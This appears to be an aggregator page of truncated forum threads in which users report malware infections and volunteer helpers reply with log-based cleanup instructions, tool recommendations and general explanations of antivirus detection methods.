We have run your software ComboFix in our Web site folder.

The log file hence created has been attached with this email.

If you can help us with your views in regard to our test, that would be great.

We look forward to your feedback.

Answer:Web Site Malware Detection

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you!

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

First, I need to know if you still need help! To tell me this, please click on http://www.bleepingcomputer.com/logreply/408907 and follow the instructions there. If you do not still need help, this is all you need to do. If you do need help please continue below.

***************************************************

If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:
If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
A new DDS and GMER log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
Please do this even if you have p... Read more

2 more replies
Relevance 80.36%

Currently I have used Malwarebytes due to its ability to install and run in safe mode and have loved it.

But I hear that some things can get past some AV.

Anyway, I was wondering if there was a chart showing all the detection rates of different FREE AVs.

My system is Malwarebytes, Spybot S&D. Edit: I also chose them as they do not conflict with other AVs.

I was also interested in bootable AVs; I heard that they exist. What are some free ones of those that I may research?

Thanks.

Answer:Research on FREE virus scanners (Detection rates and other fun stuff)

AV-Comparatives - Independent Tests of Anti-Virus Software - Welcome to AV-Comparatives.org

they don't just test free software, but include commercial stuff too.

9 more replies
Relevance 80.36%

Hi, I was a big fan of Avira free antivirus, but since version 15.0.17 (I think) it is not possible to choose interactive action on detection for the Real-Time protection module. It always sends the detected file to quarantine.

Does anybody know how to restore the old behavior?
 

More replies
Relevance 80.36%

On their site it is written that only one on-demand scan will be performed. Does that mean if I run the online scanner on my PC once and clean detected items, I will not be able to use it in future? There is also a 30-day unlimited trial offer given. Not sure if this is about their private wifi or online scanner. Seeking some advice and feeling terrified.

Answer:ESET online scanner provides only one time free detection and cleaning?

What web page did you see that information?

The main scanner page and FAQs do not say it can only be used one time.
http://www.eset.com/int/home/products/online-scanner/
http://www.eset.com/int/home/products/online-scanner/faq/

After every scan, you have the option to uninstall the ESET Online Scanner with all its components or leave them for future scanning.

8 more replies
Relevance 79.95%

Just saying hi to everyone. I use Bleeping Computer with a lot of my malware issues. I'm tech support for a large office, and believe me, people get infected all the darn time. McAfee, and even the new Norton, is not enough for protection. I'm curious to see if there is such a product on the market that will stop say 98% of all intrusions. I'll be looking over the forums to see if anyone has found such a thing, and what it costs. Thanks to the guys/gals for having this site, you are appreciated.

Answer:Looking for the best Malware detection/removal tool

Choosing a security toolkit with anti-virus, firewall and anti-malware programs is a matter of personal preference, your needs, your technical ability and experience, features offered, user friendliness, ease of updating (and upgrading to new program release), ease of installation/removal, available technical support from the vendor and price. Other factors to consider include detection rates and methods, scanning engine effectiveness, how often virus definitions are updated, the amount of resources the program utilizes, how it may affect system performance and what will work best for your system. A particular anti-virus that works well for one person may not work as well for another. You may need to experiment and find the one most suitable for your use and your system. There is no universal "one size fits all" solution that works for everyone and there is no best anti-virus. For more specific information to consider, please read Choosing Your Anti-virus Software and How to choose a firewall.

No single product is 100% foolproof and can prevent, detect and remove all threats at any given time. Just because one anti-virus detected threats that another missed, does not mean it's more effective. The security community is in a constant state of change as new infections appear and it takes time for them to be reported, samples collected, analyzed, and tested by anti-vendors. Security vendors use different scanning engines and different detection methods such as heuristic a... Read more

1 more replies
Relevance 79.95%

Today Bing Webmaster alerted me to URLs infected with malware on a website I manage with the references as 
 
URL | TYPE | ADDITIONAL DETAILS | LAST SCANNED | LAST DETECTED
http://lightpixiestudio.com/giant-arrows-across-america | Malware reference found on the page | Malware Network Reference | 3/30/2015 | 3/30/2015
http://lightpixiestudio.com/car-crazy-for-carhenge | Malware reference found on the page | Malware Network Reference | 3/24/2015 | 3/24/2015
http://lightpixiestudio.com/grand-teton | Malware reference found on the page | Malware Network Reference | 3/21/2015 | 3/21/2015
http://lightpixiestudio.com/fairchild-tropical-botanic-garden-miami-florida | Malware reference found on the page | Malware Network Reference | 3/21/2015 | 3/21/2015
http://lightpixiestudio.com/star-valley-afton-wyoming | Malware reference found on the page | Malware Network Reference | 3/21/2015 | 3/21/2015
 
 
and the Malware Network Reference as: "Reference to known malware distribution network detected. This could be via inclusion of an iframe or frame tag, an embedded object, or a script tag."
 
I found a similar topic here from last summer with a successful outcome, but as it's many months old, I'm reluctant to blindly follow those instructions. Also it's unclear to me how adware and malware maintenance on my desktop fixes anything on a WP website served by GoDaddy. FYI: I constantly scan my computer with Windows Security Essentials, Malwarebytes Anti-Malware Premium, and CCleaner Professional. The website has the... Read more

More replies
Relevance 79.95%

I haven't found any malware before, now on average McAfee finds avg. 18.
Would you please read my scriptfraud and HJT? Thank you so much.

SmitFraudFix v2.300
Scan done at 15:33:57.14, Tue 03/04/2008
Run from C:\Documents and Settings\Owner\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode


Answer:Solved: sudden malware detection avg. 27

9 more replies
Relevance 79.95%

Malware Detection Techniques
Signature Based or Pattern Matching or String or Mask or Fingerprinting Technique

A signature is an algorithm or hash (a number derived from a string of text) that uniquely identifies a specific virus. Depending
on the type of scanner being used, it may be a static hash which, in its simplest form, is a calculated numerical value of a snippet
of code unique to the virus. Or, less commonly, the algorithm may be behavior-based. A single signature may be consistent
among a large number of viruses. A virus signature is the viral code. To identify viruses and other malware, antivirus software
compares the contents of a file to a dictionary of virus signatures.

Heuristic Analysis or Pro-Active Defense

Heuristic scanning is similar to signature scanning, except that instead of looking for specific signatures, heuristic scanning
looks for certain instructions or commands within a program that are not found in typical application programs. As a result, a
heuristic engine is able to detect potentially malicious functionality in new, previously unexamined, malicious functionality such
as the replication mechanism of a virus, the distribution routine of a worm or the payload of a Trojan.

Here are a few of the common heuristic scanning techniques:

File Emulation or Sandbox or Dynamic:

Also known as "sandbox testing" or dynamic scanning, file emulation allows the file to run in a controlled virtual system (or
"sandbox") to see what it does. If t... Read more

More replies
Relevance 79.95%

I have removed many things from my computer, but I can't seem to get it all cleaned out. I can't get microsoft updates and it seems to be blocking many spyware detection programs. I have tried everything and the problems just won't end. I have found both Drive Defender and WIN Antispy as well as Adware. I think Adware is the one that keeps coming back, but there seems to be so much more. Also had mustafx.

Here's my Deckard's log and attachment:




Answer:spyware detection malware problems-BAD

Hi westcoastkevin and welcome to TSF

From Control Panel > Security Centre Under 'Manage Security Settings for' click Automatic Updates
Place a check next to Turn off Automatic Updates and click Apply to turn updates off.
Now place a check next to Automatic (Recommended) and click Apply to switch them back on
Exit Security Centre
Reboot
Are you able to install updates now?

---------------------------------
Download Combofix from any of the links below, and save it to your desktop.

Link 1
Link 2
Link 3


**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

If you're not sure how to disable them then double-check against the list found >>>HERE<<< This list is not all inclusive, if your programs are not listed and you are unsure then please ask before continuing.

--------------------------------------------------------------------

Double click on combofix.exe & follow the prompts. When finished, it will produce a report for you.
Please post the "C:\ComboFix.txt"
Note:
Do not mouseclick combofix's window while it's running. That may cause it to stall

-------------------------------------... Read more

19 more replies
Relevance 79.95%

The message "Malware Detected: Block or Allow" appeared right in the exact same spot where I routinely see my anti-virus asking me to buy stuff where "Allow" is where the "No" button normally is. I immediately ran a virus scan which detected a Trojan (generic kind; no specific name). It was then supposedly removed but...my PC is now acting kind of funny. Windows won't create Restore Points, manual or otherwise, the graphics tend to stutter and I'm routinely told my graphics driver is out of date (it's not), and I occasionally see file transfer graphics popping up in the corner of the screen.
Anyway, something feels off. I've run multiple virus scans (Avira, MalwareBytes, SuperAntiSpyware, Rogue Killer) but they haven't found anything. I know some malware only needs a few seconds upon clicking that "allow" button to cause all sorts of chaos. I just want to be sure.
DDS:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17126
Run by david at 20:53:35 on 2014-06-22
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.4094.3081 [GMT -4:00]
.
AV: Avira Desktop *Enabled/Updated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Enabled/Updated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\aties... Read more

Answer:Accidentally Clicked "Allow" on Malware Detection

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.

===

Please download AdwCleaner by Xplode onto your Desktop.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Click the Report button and the report will open in Notepad.

IMPORTANT
If you click the Clean button all items listed in the report will be removed.

If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click the Scan button and wait for the process to complete.
Check off the element(s) you wish to keep.
Click on the Clean button follow the prompts.
A log file will automatically open after the scan has finished.
Please post the content of that log file with your next answer.
You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).

===

Download the correct version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
The... Read more

15 more replies
Relevance 79.95%

Hi Guys,

I am looking to create a (hopefully highly customizable) VM to infect with malware so I can test a few malware detection scripts etc.

My original plan was to download the ISO myself from the source website (i.e. Get Ubuntu | Download | Ubuntu) and go from there, but I was wondering if people could recommend a security specific / aimed resource that might have a Unix build (preferably Ubuntu) ISO that was fairly bare bones, but would also be malware free.

If using the source ISO that is my best option, any advice on setting up / creating the VM so to minimise the chance of malware escaping? I plan on running everything inside a sandbox (cuckoo), and I've seen a few threads on here already mentioning disabling virtualisation etc, but any extra info is always welcome.

Thanks guys,
Kroack.
 

More replies
Relevance 79.95%

Hello, this has been posted already, but perhaps the treatment method may vary depending on my situation and logs etc, so reposting...

XP SP3
IE 8 BETA (although using Firefox mainly)
Tried: Fullscan with KIS 2009 (kaspersky) and Adaware.
It removed some win32trojan downloader agent mkav or so, but problem remains.

Description:
I've been experiencing multiple iexplore.exe processes running freely without my control (I use Firefox mainly). While they run, there's a weird Chinese speech in the background which sounds like a commercial, it may repeat itself a few times and even overrun itself in sound.

The Problem:
iexplore.exe keeps on running along with the CHINESE talking in the background.

Now, if I run full scan on my system with KIS, it wouldn't detect anything, not to mention updated Lavasoft Ad-Aware 2008...

DDS LOG:

DDS (Version 1.0) - NTFSx86
Run by Idan at 22:27:53.26 on Mon 12/08/2008
Microsoft Windows XP Professional 5.1.2600.3.1255.972.1033.18.2046.1606 [GMT 2:00]


Answer:iexplore.exe malware detection and removal ?

Hello and welcome to TSF

Please do NOT start multiple threads on the same problem.

Here is what it says in the forum rules:


Quote:

MULTIPLE POSTING

This refers to posting the same question or same replies in multiple areas of the site (also called flooding). Please post only once. If you feel you have posted in the wrong forum, contact a Moderator or Manager, who will move the post for you. This also includes the creation of multiple new threads on the same or similar topics and sending PM's continuously to one or more Staff members.

Click here for the rules

This thread is Closed

1 more replies
Relevance 79.95%

HI - I detected a few malware with NAV and Kaspersky and was about to use OT MOVE IT but recall stern instructions to not use the tools I was given on this site without supervision. Please advise on how to remove the following malware -- see logs below. So far I am not really getting any problems except some weird graphics disruptions while using iTunes.... but that might be a lack of system resources....? Please advise
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:10:38 AM, on 4/7/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)
Boot mode: Normal

More replies
Relevance 79.95%

Sana plans stand-alone antivirus product
News Story by Robert McMillan
SEPTEMBER 20, 2005

Most antivirus products identify malicious software by comparing the software being run to pieces of known worm and virus code, called signatures. Primary Response, however, determines whether software is malicious based on a mathematical analysis of what it's trying to do. This means that, unlike other products, Primary Response can protect users even from unreported viruses,... computerworld.com/securitytopics

More replies
Relevance 79.95%

Usually trojans were found in System Volume Information Files. Every time after Threat Scanning by Malwarebytes Anti-Malware, action was applied and removal of such files via System Reboot. Thereafter, through similar scanning of Malwarebytes Anti-Malware again, same detection is found again with similar files which means that those trojans cannot be actually removed.
Please check and advise what remedy actions I have to undertake in order to avoid such similar re-occurrence of infection to my Registry Files. Required scan files are attached for your reference and checking.
Many thanks for your kind assistance!
 

Answer:Malware Detection On System Registry

Please download zoek.zip or zoek.rar by smeenk from here or here and save it to your Desktop.
Unpack the archive...

Close any open browsers
Temporarily disable your AntiVirus program. (If necessary)
If you are unsure how to do this please read this or this Instruction.

Double click on zoek.exe to run the tool .
Please wait while the tool does not start...

Copy the text present inside the code box below and paste it into the large window in the zoek tool:
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system

Code:
createsrpoint;
gpt.ini;z
C:\Windows\System32\GroupPolicy;v
C:\Windows\SysWOW64\GroupPolicy;v
StandardSearch;
emptyfolderscheck;
installer-list;
installedprogs;
uninstall-list;

Click on button.
Please wait until a logreport will open (this can be after reboot)

Save notepad to your Desktop and attach here zoek-results.log
Note: It will also create a log in the C:\ directory named "zoek-results.log"

 

48 more replies
Relevance 79.95%

Microsoft has several malware detection products such as Windows Defender and Windows Software Removal Tool.
Does Apple have any comparable products that it produces for its platforms?

Thanks.

Answer:Malware detection products from Apple?

No, as far as I know, Apple does not produce anti-virus products.

But there are several AV vendors that offer products for many platforms, also OSX.

1 more replies
Relevance 79.95%

As stated in the title. Need a new one
 

More replies
Relevance 79.95%

Malware Detection Techniques

Signature Based or Pattern Matching or String or Mask or Fingerprinting Technique

A signature is an algorithm or hash (a number derived from a string of text) that uniquely identifies a specific virus. Depending on the type of scanner being used, it may be a static hash which, in its simplest form, is a calculated numerical value of a snippet of code unique to the virus. Or, less commonly, the algorithm may be behavior-based. A single signature may be consistent among a large number of viruses. A virus signature is the viral code. To identify viruses and other malware, antivirus software compares the contents of a file to a dictionary of virus signatures.

Heuristic Analysis or Pro-Active Defense

Rest of content can be seen here: http://forum.kaspersky.com/index.php?showtopic=234997&view=findpost&p=1845013

Topic edited to conform to fair use laws and avoid copyright infringement. ~ Animal

Answer:Malware/Virus Detection Techniques

There are other malware checks which are not discussed in public to safeguard the program from malware writers who would use that information for nefarious purposes.

1 more replies
Relevance 79.54%

thanks in advance
I am looking for things like netwitness and etc but free thanks
 

Answer:school me on free network analysis security detection tools/ softwares

http://securityonion.blogspot.com/
 

5 more replies
Relevance 79.13%

Good evening, I recently watched again this Norton security 2015 review, and I'd like to ask why Norton is so good at web prevention but it hasn't a good detection ratio on the malware pack.

Source of review: ThePCSecurityChannel
-https://www.youtube.com/watch?v=Pyqq2xURHJk
 

Answer:Norton bad detection ratio on malware pack

come on friend, you are on MT, now stop bothering about this type of so-called test
 

4 more replies
Relevance 79.13%

April 9, 2011
I use Trend Micro Titanium; pleased with this.
However, I need to know if this package is the best or the worst for detecting malware? Doing the reading of trying to find a simple answer ... what a headache I get.
Conclusion: try Malwarebytes, then buy this s/w package.
Question: Will this work without any conflict with my Trend Titanium?
Answer is: ( this is why I am turning to you ... your knowledge )
 

Answer:which s/w malware detection is best to use with Trend Micro Titanium?

Welcome to Major Geeks!

Questions about what is the best malware detection program are very difficult to answer. It can be very subjective and change every month as new updates for software occur and it also changes as new malware comes out. In reality there is no best single piece of software; you do need a layered approach to protection as discussed in the below How to Protect yourself from malware! And the most important part of protection is still the end user.

However to more directly answer your question, Trend Micro is a reasonable program. Some people have complained of its inability to remove malware, but that complaint can be made of many commercial antivirus and security suites. And at least one last review did not think too much of Trend Micro ( for example: http://www.av-comparatives.org/images/stories/test/summary/summary2010.pdf ) but the review is from last year but it was not great.

Malwarebytes is not an antivirus program and you only get protection with the paid version. Malwarebytes is a very good antimalware program which is a highly recommended tool to add along side your antivirus and firewall programs.
 

1 more replies
Relevance 79.13%

Detection test where Comodo gains first place among some other AV programs.
http://trsec.net/threads/trsec-malware-detection-test-may-2013-free-antivirus-test.3140/
 

Answer:TRSec Malware Detection Test - May 2013

Nikos751 said:

Detection test where Comodo gains first place among some other AV programs.
http://trsec.net/threads/trsec-malware-detection-test-may-2013-free-antivirus-test.3140/


1-Comodo Antivirus - Detected: 588 (Version: 6.1.276867.2813 - Database: 16250)

2-Avast Free 8 - Detected: 575 (Version: 8.0.1489 - Database: 13051301)

3-Avira Free Antivirus 2013 - Detected: 534 (Version: 13.0.0.3640 -Database: 7.11.78.62 )

4-Panda Cloud AV Free 2013 - Detected: 514 (Version: 2.1.1 - Database: 13.05.2013 21.34)

5-AVG Free 2013 - Detected: 501 (Version: 2013.0.3336 - Database: 3162/6321)

6-ZoneAlarm Free Antivirus + Firewall - Detected: 478 (Version: 11.0.000.157 - Database: 1112777536)

7-Immunet Protect Plus - Detected: 356 (Version: 3.0.8.9025 - Database: 13.05.2013 22.18)

8-Baidu Antivirus - Detected: 274 (Version: 3.4.1.29117 - Database: 13.05.2013 22.02)

Questionable at best and entertaining at most.
Now do not get me wrong no discredit to the mentioned program.
But Comodo first in detection? That's just LOL.

Let me show you ok?
AV-Test did test 25 Antivirus "home" products on Windows 8 32 bit and Comodo CIS ranked 22nd place.
Test Jan & Feb 2013 (Click on the drop down arrow to select the list upon protection)

The Corporate User version of this test did not even include Comodo.

Or how about the latest VB-100 Test?
0 Pass, 4 Fail in last 12 tests (8 tests not entered)

And AV-Comparatives is even more shocking as th... Read more

14 more replies
Relevance 79.13%

Hi, thanks for looking
I have a problem with my PC, I don't have any idea how it got here although I think it was installed by a trojan that infected the PC.

My HijackThis logfile is:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 00:24:52, on 04/02/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\IVT Corporation\BlueSoleil\BTNtService.exe
C:\WINDOWS\system32\CTsvcCDA.EXE
C:\WINDOWS\system32\crypserv.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\PnkBstrB.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\MusicMatch\MusicMatch Jukebox\mmtask.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starte... Read more

Answer:Spyware Detection Alert/Malware Crush. Please help, I can't get rid of it!

Welcome to TSG

Download Combofix from any of the links below, and save it to your desktop. For information regarding this download, please visit this webpage: http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Link 1
Link 2
Link 3
**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

--------------------------------------------------------------------

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.
Please post the "C:\ComboFix.txt" along with a new HijackThis log for further review.
Note:
Do not mouseclick combofix's window while it's running. That may cause it to stall
 

1 more replies
Relevance 79.13%

I started having google redirection problems a couple of days back. I suspected that there was a malware attack and tried running CA virus scan and it said there was a problem with my scanner. I then tried running Malwarebytes Anti-Malware. It scanned for 5 seconds and then disappeared. I tried to restart the scan, but started getting the following message "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access". I then tried running Spybot - Search and Destroy, but ended up getting the same message above.
After doing some research online, I came across this forum. As instructed by chaslang, I first read the "READ & RUN ME FIRST. Malware Removal Guide" and downloaded the programs one by one. I tried running SUPERAntiSpyware Free Edition. I have the same issue. It starts scanning for a few seconds and then shuts down. The next time I try to run it, I get the "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access".
I presume my computer is severely infected. I would really appreciate it if someone could help me with this
 

Answer:Google Redirection and Malware Detection Problem

Hi and welcome to Major Geeks!

Have you attempted to run SAS and the rest of the Read and Run Me First procedures through Safe Mode with Networking? Let me know if this also does not work for you.






If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:

Starting your computer in Safe mode

If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware and Malwarebytes ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes, you could use a flash drive too, but flash drives are writeable and infections can spread to them.
If you cannot seem to login to an infected user account, try using a different user account (if you have one) in either normal or safe boot mode and running only SUPERAntiSpyware and Malwarebytes while logged into this other user account. Then reboot and see if you can log into the problem user account. If you can then run SUPERAntiSpyware, Malwarebytes, ComboFix and MGtools on the infected account as requested in the instructions.


 

49 more replies
Relevance 79.13%

I cannot complete an antivirus scan. I've uninstalled and reinstalled AVG with no change. Malwarebytes also won't complete a scan. It stops about half way through and shuts down. I can't reopen the program after that, I get an error message that I don't have the right permissions to access. I've had the same results with several different Antivirus programs and malware removal programs. During one malware scan I watched the files being scanned closely, and shortly before the scan terminated and shut down, I noticed that the files being scanned were called Trojan.Win32 and Vundo. (I think these were the names, I only saw them once and they went by quickly)

The DDS text file and the Attach text file are attached.
GMER shuts down immediately after I click "Scan" and so no log file is attached.
Any help would be great. Thanks!

.
DDS (Ver_2011-06-23.01) - NTFSx86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_26
Run by Joanie at 11:43:27 on 2011-08-02
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.3316.2046 [GMT -5:00]
.
AV: AVG Anti-Virus Free Edition 2011 *Enabled/Updated* {17DDD097-36FF-435F-9E1B-52D74245D6BF}
FW: AVG Firewall *Disabled*
.
============== Running Processes ===============
.
C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
"\\.\globalroot\Device\svchost.exe\svchost.exe"
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WIND... Read more

Answer:Antivirus & Malware Detection Won't Complete a Scan

Good evening. Take a trip to this webpage for download links and instructions for running Combofix by sUBs: http://www.bleepingcomputer.com/combofix/how-to-use-combofix

* When prompted to save Combofix, change the filename BEFORE saving it - any name will do, as long as it has .exe at the end. Please be aware that this tool may require the PC to be rebooted so close any programs you have open before you start. When CF has finished, it will produce a log - C:\ComboFix.txt - copy and paste
Let me know how the PC is behaving.

* There are two points to note from the instructions page:

1) The Recovery Console.
It is recommended that you install this as, in certain circumstances, it may be the difference between a successful repair and a reformat. If you are uncertain as to whether or not you already have the Recovery Console installed, simply run CF and it will prompt you if it does not detect it.
CF will complete some, but not all, of its removal tasks without the installation of the Console, so you are free to choose whether you want to complete this step, but it is in your interests to do so.

2) Disabling your Anti-Virus.
CF has been the victim of false-positive detections on occasion and a resident AV may incorrectly identify and delete part of the tool which won't do it much good. If you don't disable your AV, you may not get the results you hoped for!

29 more replies
Relevance 79.13%

So, we got our new computer. I am trying to download the same software that I had on the old one, specifically Free mp3 joiner.
QUESTION: Is Webroot always going to detect malware if there are boxes that will have to be unchecked to keep it from downloading stuff you don't want?
I never had any problem running this software on the other computer. I always unchecked those boxes.
Thanks.
 

More replies
Relevance 79.13%

Please check the attached logs.

As for "Clearly describe in detail the problems you are having and how long ago they started. Think about what you were doing at the time. Advice would be appreciated." -- This is a friend's computer, so I'm not sure how long it's been having problems. I saw one of the earlier detected issues was related to some free chess game. That was installed (according to Control Panel) in March.

Thank you.
 

Answer:Detection programs found trojans and malware

Now download The Avenger by Swandog46 to your Desktop.

Please disable all anti-virus and anti-spyware programs while we do the following (re-enable when you are finished):

Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:




O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
O4 - HKCU\..\Run: [dsvect] "C:\Users\Owner\AppData\Roaming\dsvect.dll",IncrementalDecoder
O4 - HKCU\..\Run: [piroxr] "C:\Users\Owner\AppData\Roaming\piroxr.dll",set_invert_alpha
O4 - HKCU\..\Run: [vcspiz] "C:\Users\Owner\AppData\Roaming\vcspiz.dll",Warn
O4 - HKCU\..\Run: [tatmac] "C:\Users\Owner\AppData\Roaming\tatmac.dll",GetCode
O4 - HKCU\..\Run: [uapip] "C:\Users\Owner\AppData\Roaming\uapip.dll",vGetTokenA
O4 - HKCU\..\Run: [rdpir] "C:\Users\Owner\AppData\Roaming\rdpir.dll",Mem_Realloc
O4 - HKCU\..\Run: [mapad] rundll32.exe "C:\Users\Owner\AppData\Roaming\mapad.dll",_Repeat

After clicking Fix, exit HJT.

Now copy just the bold text below ... Read more

1 more replies
Relevance 79.13%

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Panda Security\Panda Antivirus Pro 2010\TPSrv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Tall Emu\Online Armor\oasrv.exe
C:\PROGRAM FILES\PANDA SECURITY\PANDA ANTIVIRUS PRO 2010\WebProxy.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIAFA.EXE
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Tall Emu\Online Armor\oaui.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\PeerGuardian2\pg2.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Panda Security\Panda Antivirus Pro 2010\PsCtrls.exe
C:\Progra... Read more

Answer:Virus/Malware not being detected by Spyware Detection

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

My name is Syler, I will be helping you to solve your Malware issues. Whilst I am helping you, I would be grateful if you would note the following:

Please do not run other tools or scans unless I ask you to and follow all the steps I give you, in order.
Copy and paste all logs requested in your reply. Do not attach them unless asked to.
If you don't know or understand something, please don't hesitate to say or ask before you proceed with my instructions.
Please continue to work with me, until I tell you your machine appears to be clean. Absence of symptoms does not mean that everything is clear.
If I do not hear back from you within 5 days of my last post, then this topic will be closed.

Please download Malwarebytes' Anti-Malware from Here
Note: If you already have Malwarebytes' Anti-Malware, just update then run it.
Double Click mbam-setup.exe to install the application.
Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest ve... Read more

2 more replies
Relevance 79.13%

somehow i started to get "Security Center Alert" pop ups (about 6 or 7 different messages) and some trojan called Malware Defense started to self load itself. the SCA pop ups dont allow anything but "enable protection" which doesnt do anything (the Keep Blocking and Unblock buttons are inaccessible)...

i am unable to clear it with AVG 8.5. i found some OTHER malware stuff that i assume was cleared. it took about 35 minutes to run the scan...

i also get a "Web page unavailable while offline" pop up asking if i want to connect or stay offline. obviously this is fraudulent because im online on this forum. it comes on for about 10-13 seconds then blinks off. then it comes back on again...

i have SuperAntiSpyware on my computer but it wont run (SAS has encountered a problem and needs to shutdown etc). i downloaded Malwarebytes and it took a couple of attempts for it to run the setup. i got it installed but it wont run either (no start)...

some of the SCA pop ups list Virus.Win32.Hala.a, Virus.Win32.Gpcode.ak, Trojan.Win32.Agent.dcc then there is also Net-Worm.Win32.DipNet.d of course i dont even know if these are legitimate notifications. sometimes i get the balloon pop up on the system tray that says something about Chin09 or something. it doesnt stay popped up long enough to read it all...

